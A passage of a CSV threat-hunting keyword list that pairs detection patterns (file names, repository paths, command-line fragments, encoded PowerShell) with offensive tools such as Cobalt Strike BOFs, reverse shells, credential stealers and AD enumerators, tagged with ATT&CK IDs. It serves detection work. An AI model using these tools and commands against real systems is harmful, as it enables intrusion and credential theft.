T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*RunOF.Internals*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*runShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*runshellcode.asm*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - 
T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*runshellcode.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*runshellcode.o*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - 
TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RuralBishop.csproj*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*RuralBishop.exe*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*RuralBishop.sln*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*RuralBishop-master*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*rustbof.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"*rustcat-3.0.0.zip*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rusthound * --zip --ldaps --adcs --old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*rusthound *--domain*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - 
TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound *--ldapfqdn *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound *-ldaps *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound -d *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rusthound* --adcs --dc-only*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*RustHound-main*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*rvazarkar/GMSAPasswordReader*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and 
parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*Rvn0xsy/Cooolis-ms*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*rvrsh3ll/BOF_Collection*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*rvrsh3ll/TokenTactics*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" 
+"*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*rwxfinder.*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*RWXfinder-main*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" +"*RXh0ZXJuYWwgQzIgUG9ydA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*rxwx/cs-rdll-ipc-example*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*s0lst1c3*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/s0lst1c3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*s0md3v*","offensive_tool_keyword","Github Username","github username hosting offensive tools. mostly for web hacking","N/A","N/A","N/A","N/A","Web Attacks","https://github.com/s0md3v","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*s0md3v*Striker*","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/s0md3v/Striker","1","1","N/A","N/A","10","2116","454","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z" +"*S12cybersecurity/Admin2Sys*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" +"*S12cybersecurity/RDPCredentialStealer*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*S3cretP4ssw0rd!*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate 
privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*S3cur3Th1sSh1t*","offensive_tool_keyword","Github Username","Github username of hackr known for exploitation scripts Pentesting. scripting and pwning!","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*S3cur3Th1sSh1t/MultiPotato*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*S3cur3Th1sSh1t/PowerSharpPack*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*s3scanner -*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*s3scanner dump *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*s3scanner scan *","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - 
T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*S3Scanner-master*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*S4U2self.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*S4uDelegator.*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*S4UTomato 1.0.0-beta*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.csproj*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" 
+"*S4UTomato.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato.sln*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*S4UTomato-master*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*s7scan*","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","2","121","45","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z" +"*sa7mon/S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*safari_in_operator_side_effect.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
